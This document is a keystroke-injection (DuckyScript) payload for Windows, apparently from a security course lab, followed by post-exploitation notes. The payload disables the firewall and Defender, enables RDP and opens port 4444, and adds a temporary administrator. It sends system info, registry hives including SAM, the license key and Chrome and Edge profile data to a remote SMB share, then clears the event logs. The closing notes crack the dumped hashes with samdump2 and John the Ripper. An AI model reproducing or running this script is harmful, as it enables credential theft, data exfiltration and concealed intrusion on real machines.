DELAY 1000
REM Open Command Prompt
GUI r
DELAY 1000
STRING powershell
ENTER

DELAY 4000
STRING Start-Process powershell -Verb RunAs
ENTER
STRING Stop-Process -Name powershell -Force
ENTER 
DELAY 3000

DELAY 3000
ENTER
ENTER
REM Disable Windows Firewall
STRING netsh advfirewall set allprofiles state off
ENTER
DELAY 3000


REM Disable Windows Defender Real-Time Monitoring
STRING Set-MpPreference -DisableRealtimeMonitoring $true

ENTER
DELAY 3000

REM Disable all components of Windows Defender
STRING Set-MpPreference -DisableIOAVProtection $true
ENTER
DELAY 1000
STRING Set-MpPreference -DisableScriptScanning $true
ENTER
DELAY 1000
STRING Set-MpPreference -DisableIntrusionPreventionSystem $true
ENTER
DELAY 1000
STRING Set-MpPreference -DisableBlockAtFirstSeen $true
ENTER
DELAY 1000
STRING Set-MpPreference -DisableBehaviorMonitoring $true
ENTER
DELAY 1000

DELAY 2000
STRING systeminfo > "\\192.168.128.143\Anonymous\sys_info.txt"
ENTER
DELAY 4000

DELAY 1000
REM Get the network information Ip address and network details 
STRING Get-NetIPConfiguration | Out-File -FilePath '\\192.168.128.143\Anonymous\victim_network_info.txt'
ENTER

DELAY 1000
REM Run the command to enable Remote Desktop Connection
DELAY 1000
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 3000

DELAY 3000
REM For powershell 
STRING Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -Value 0
ENTER
DELAY 3000

REM Open Multiple Ports to make the system vulnerable to for further attacks 
STRING New-NetFirewallRule -DisplayName "Open Port 4444" -Direction Inbound -Protocol TCP -LocalPort 4444 -Action Allow
ENTER

REM Create a new user named 'CNSTEST' with password '12345'
STRING net user CNSTEST cnstest /add
ENTER
DELAY 2000
REM Add the user 'CNSTEST' to the Administrators group
STRING net localgroup Administrators CNSTEST /add
ENTER
DELAY 3000

REM Retrieve MAC addresses and output to a text file 
STRING getmac /v /fo csv > "\\192.168.128.143\Anonymous\mac_address_of_victim_pc.txt"
ENTER
DELAY 1000

DELAY 3000
REM Get windows license key 
STRING $key=(Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform').BackupProductKeyDefault ; $key | Out-File -FilePath '\\192.168.128.143\Anonymous\windows_license_key.txt'
ENTER
DELAY 4000
REM Export the registry hives
STRING reg save HKLM\SECURITY "\\192.168.128.143\Anonymous\extracted_SECURITY.hiv"
ENTER
DELAY 3000
STRING reg save HKLM\SOFTWARE "\\192.168.128.143\Anonymous\extracted_SOFTWARE.hiv"
ENTER
DELAY 3000
STRING reg save HKLM\SYSTEM "\\192.168.128.143\Anonymous\extracted_SYSTEM.hiv"
ENTER
DELAY 3000
STRING reg save HKLM\SAM "\\192.168.128.143\Anonymous\extracted_SAM.hiv"
ENTER
DELAY 8000

REM Copy Google Chrome data
STRING Xcopy "C:\Users\$env:USERNAME\AppData\Local\Google\Chrome\User Data\Default" "\\192.168.128.143\Anonymous\ChromeData" /E /H /C /I
ENTER
DELAY 8000


REM Copy Microsoft data

C:\Users\test\AppData\Local\Microsoft\Edge\User Data\Default
STRING Xcopy "C:\Users\$env:USERNAME\AppData\Local\Microsoft\Edge\User Data\Default" "\\192.168.128.143\Anonymous\MicrosoftData" /E /H /C /I
ENTER
DELAY 8000

REM Deleting user 'CNSTEST' before clearing logs
STRING net user CNSTEST /delete
ENTER
DELAY 3000

REM Delete run history
STRING REG DELETE "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
ENTER
DELAY 4000


REM Deleteing all The  Logs History 

STRING Clear-EventLog -LogName System
ENTER
DELAY 1000
STRING Clear-EventLog -LogName Security
ENTER
DELAY 1000
STRING Clear-EventLog -LogName Application
ENTER
DELAY 1000

Stop-Process -Name powershell -Force

STRING exit
ENTER
DELAY 1000




####################################################################################################################






Work After the payload is being executed



===================================== password cracking =======================================================

samdump2 extracted_SYSTEM.hiv extracted_SAM.hiv > victim_hashes
when you get the list you will need to format the hashes and then will run jhon the ripper and will get the passwords for the users  

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt formatted_hashes.txt

john --show --format=nt /home/kali/Desktop/formated_hashes.txt


================================================================================================================


RDP  Remote Access runing nmap
 
xfreerdp /u:test /p:123456 /v:192.168.128.138 /dynamic-resolution


########################################Google Chrome Analysis##################################################

################################################################################################################

########################################Other registry files analysis###########################################

################################################################################################################

##################################################RDP windows OS################################################

################################################################################################################

##############################################REFERENCES########################################################

https://stackoverflow.com/questions/70873330/how-to-get-plain-string-passwords-from-hash-file
################################################################################################################